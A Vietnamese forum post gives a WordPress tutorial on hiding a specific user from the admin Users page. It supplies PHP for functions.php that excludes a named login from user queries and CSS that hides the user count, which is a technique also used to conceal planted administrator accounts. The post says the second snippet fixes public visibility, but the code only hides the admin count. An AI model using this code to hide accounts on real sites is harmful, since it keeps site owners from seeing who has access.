Hướng dẫn ẩn 1 User trong Admin Menu - Wordpress

Hello, chào mọi người, mình là Liêm MKT đây. Hôm nay mình sẽ hướng dẫn các bạn một thủ thuật ẩn User trong Admin Page của Wordpres .

Trước khi bắt đầu, các bạn tham khảo ảnh minh họa nhé.

Trước


Sau

Hướng dẫn ẩn thành viên trong trang Admin của Wordpress

Trước tiên, các bạn hãy xác định 1 user mà bạn muốn ẩn, và lấy username của user đó. (Ví dụ: mình muốn ẩn user liemmkt, thì mình sẽ lấy “liemmkt”)

Sau đó Coppy đoạn code sau và bỏ vào file function.php nằm trong thư mục /wp-content/themes/* là được

add_action('pre_user_query','yoursite_pre_user_query');
function yoursite_pre_user_query($user_search) {
 global $current_user;
 $username = $current_user->user_login;
 if ($username == '<liemmkt - im here !!!>') { 
 }
 else {
  global $wpdb;
  $user_search->query_where = str_replace('WHERE 1=1',
   "WHERE 1=1 AND {$wpdb->users}.user_login != '<liemmkt - im here !!!>'",$user_search->query_where);
 }
}

Các bạn để ý đoạn <liemmkt - im here !!!> , nó chỉnh là khu vực để chèn user của các bạn vào đó ! Hãy xóa bỏ đoạn đó và thay thế bằng Username của bạn.

Ví dụ: Xóa <liemmkt - im here !!!> và thay thanh liemmkt nằm trong 2 dấu ’ ’

Sau khi chèn xong thì các bạn nhớ ấn “Save hoặc Lưu nhé”. Giờ quay lại trang Thành viên thì sẽ thấy User đó bị ẩn đi.

Tuy nhiên, vẫn còn 1 lỗi nhỏ ở đây là, khi bạn điều hướng vào trang thành viên bên ngoài của Website thì vẫn thấy tên người dùng mà bạn đã ẩn trong trang quản trị. Vì thế, để xử lý vấn đề này, các bạn hãy thêm đoạn code sau vào file function.php để fix nó nhé.

function hide_user_count(){
?>
<style>
.wp-admin.users-php span.count {display: none;}
</style>
<?php
}
add_action('admin_head','hide_user_count');

Nguồn: https://thietkewebfree.com/huong-dan-an-1-user-thanh-vien-trong-trang-quan-tri-admin-page-cua-wordpress.html/

2 Likes